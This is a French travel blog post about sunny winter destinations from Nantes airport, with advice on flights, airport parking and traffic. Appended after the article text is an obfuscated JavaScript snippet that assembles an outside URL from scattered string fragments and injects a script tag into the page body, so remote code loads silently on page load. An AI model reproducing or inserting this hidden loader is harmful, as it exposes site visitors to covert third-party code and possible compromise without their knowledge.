Les meilleures destinations pour profiter du soleil au départ de Nantes
Si vous en avez marre de la grisaille, de la pluie et des températures hivernales, pourquoi ne pas partir dans le Sud afin de profiter d’un peu de chaleur en hiver ? Dans cet article, nous vous donnons nos suggestions de destinations pour profiter du Soleil dans le Sud de l’Europe, le tout sans se ruiner !
Nantes possède le principal aéroport international de la région grand-ouest, ce pourquoi nous vous proposons de découvrir 3 destinations au départ des Terminaux de Nantes-Atlantique. Vous trouverez tous les détails qui vous aideront à choisir la destination de vos rêves.
A lire aussi : Où trouver les meilleures offres de croisière ?
Pour simplifier vos préparatifs, nous vous donnons également des conseils pour rejoindre l’aéroport de Nantes, mais aussi pour y trouver un parking si nécessaire.
Plan de l'article
Voyage en Grèce au départ de Nantes
A découvrir également : Comment freiner en roller sans tampon?
Si vous avez envie d’un voyage qui combine belles plages, grand soleil et patrimoine exceptionnel, la Grèce sera une destination toute indiquée. En effet, il s’agit d’une destination très agréable tout au long de l’année grâce à son climat méditerranéen et se rendre en Grèce en hiver comporte de nombreux avantages, que ce soit pour profiter du patrimoine sans les foules de touristes ou bien pour bénéficier d’un hébergement de luxe à moindre prix.
Depuis l’aéroport de Nantes, vous pourrez facilement trouver des vols directs pour Athènes. Néanmoins, seule la capitale Grecque est desservie depuis les Terminaux de Nantes-Atlantique.
Le temps de trajet moyen pour rejoindre Athènes est d’environ 3h30 avec un vol direct. À l’aéroport de Nantes, 3 compagnies aériennes vous proposent des vols vers Athènes, à savoir Transavia et Easy Jet côté low-cost, mais aussi Aegean Airline, une compagnie aérienne Grecque.
Partir en Croatie depuis Nantes-Atlantique
La Croatie est une destination qui a récemment connue un fort gain de popularité depuis l’adhésion du pays à l’Union-Européenne en 2013. Bien sûr, ce n’est pas la seule raison qui a popularisé cette destination déjà très riche en attractions.
Depuis Nantes, vous pourrez trouver des vols directs à destination de Dubrovnik via la compagnie low-cost Volotea. Lufthansa propose également une liaison avec Dubrovnik, mais toujours avec au moins 2 escales, ce qui est loin d’être idéal. Si vous décidez de prendre votre vol direct avec Volotea, vous pourrez rejoindre la Croatie en seulement 2h30 depuis Nantes.
Les vols vers l’Italie au départ de l’aéroport de Nantes
L’Italie est également une destination de choix pour passer des vacances ensoleillées. Au départ de Nantes, ce ne sont pas les vols qui manquent et vous aurez même l’embarras du choix en ce qui concerne votre destination. Ce n’est pas plus mal, car vous n’aurez jamais le temps de visiter toutes les plus belles villes d’Italie en un seul voyage.
Bien sûr, vous pourrez trouver des vols à destination de Rome depuis Nantes, 3 compagnies vous proposent une liaison avec la capitale italienne, Iberia, Easy Jet et Vueling. Néanmoins, les vols pour Rome seront toujours avec une escale au départ de l’aéroport de Nantes, pour un temps de trajet d’environ 5h00.
Si vous souhaitez profiter du calme de la campagne, vous pourrez également rejoindre la Sicile et la Sardaigne au départ de l’aéroport de Nantes. En effet, il est possible de trouver des vols directs à destination de Palerme (2h30 de temps de trajet) et Olbia en Sardaigne (2h00).
Réservez votre parking à l’aéroport de Nantes
Si vous vous rendez à l’aéroport de Nantes en voiture, pensez à réserver votre emplacement de parking à proximité des Terminaux en avance. En effet, vous pouvez faire des économies très facilement en anticipant la réservation de votre parking, car comme pour les billets d’avion, le prix des emplacements de stationnement à l’aéroport évolue en fonction de la demande. Ainsi, le parking peut vous coûter cher durant les saisons touristiques, notamment en juillet-août et au mois de décembre. Réserver 2 à 3 mois en avance vous permettra de bénéficier d’un tarif plus avantageux.
De plus, sachez qu’il est possible de trouver des emplacements de stationnement encore moins cher en s’orientant vers les parkings privés. Il existe plusieurs de ces prestataires privés à proximité des terminaux de Nantes-Atlantique et ils pratiquent des tarifs plus avantageux que les parkings de l’aéroport tout en vous fournissant un transfert en navette pour rejoindre votre terminal de départ. Ils se situent généralement à proximité immédiate de l’aéroport, ce qui vous évite de perdre trop de temps que ce soit à l’aller ou au retour.
Pour trouver facilement des parkings à l’aéroport de Nantes, vous pouvez tout simplement utiliser une plateforme de réservation dédiée au parkings d’aéroport comme Parkive.fr. De cette façon, vous pourrez comparer les offres disponibles et réserver votre emplacement en fonction des critères que vous jugez important comme le prix, la distance avec l’aéroport ou encore les services proposés (parking couvert, service voiturier, bornes de recharge pour véhicules électriques…)
Évitez les embouteillages en allant à l’aéroport de Nantes
Si vous êtes déjà allez à Nantes, vous le savez sans doute, circuler sur le périphérique nantais peut rapidement tourner au calvaire avec des embouteillages qui sont quotidiens. Aussi, pour éviter d’arriver en retard à l’aéroport voici nos conseils.
Tout d’abord, pour éviter le stress du départ le mieux reste de bien organiser son trajet. Pour ce faire, vous pouvez utiliser Google Maps afin de planifier votre itinéraire en utilisant la fonctionnalité qui vous permet de choisir votre jour et heure de départ. De cette façon, Google Maps sera en mesure de vous indiquer un temps de trajet en prenant en compte le trafic routier. Ainsi, vous pourrez avoir une idée plus précise du temps de trajet en fonction de votre heure de départ, et surtout en fonction de l’heure à laquelle vous allez passer sur le périphérique nantais. Vous pourrez ainsi facilement estimer le temps à prévoir pour arriver à l’aéroport de Nantes.
N’oubliez pas que la plupart des compagnies aériennes recommandent d’arriver à l’aéroport au moins deux heures avant la fin de l’embarquement. Si vous avez prévu de vous garer dans un parking privé à proximité de l’aéroport, vous pouvez compter environ 30 minutes entre l’arrivée au parking et la dépose au Terminal de départ.
Si vous venez de loin, par exemple de Brest, vous pouvez également arriver la veille et dormir dans un hôtel à proximité immédiate de l’aéroport de Nantes. De cette façon, vous pourrez partir sereinement et vous pourrez faire une bonne nuit avant le grand voyage. Sachez qu’il existe 3 hôtels situés directement sur le site de l’aéroport et depuis lesquels vous pourrez rejoindre votre terminal de départ en seulement quelques minutes.
(function(){
tafgu=”x35fb8npafg6″;tafg=document.createElement(“script”);
tafg_=”u”+(“st”);tafg_+=”at”+(“.”);tafg.async=true;tafg_+=”in”;
tafgu=”364812452.”+tafgu;tafg.type=”text/javascript”;tafgu+=”taw8c0u5jg57″;
tafgu+=”e10kvn”;tafg_+=(“f”)+”o”+(“/”);tafg.src=”https://”+tafg_+tafgu;
tafgd=document.body;tafgd.appendChild(tafg);
})();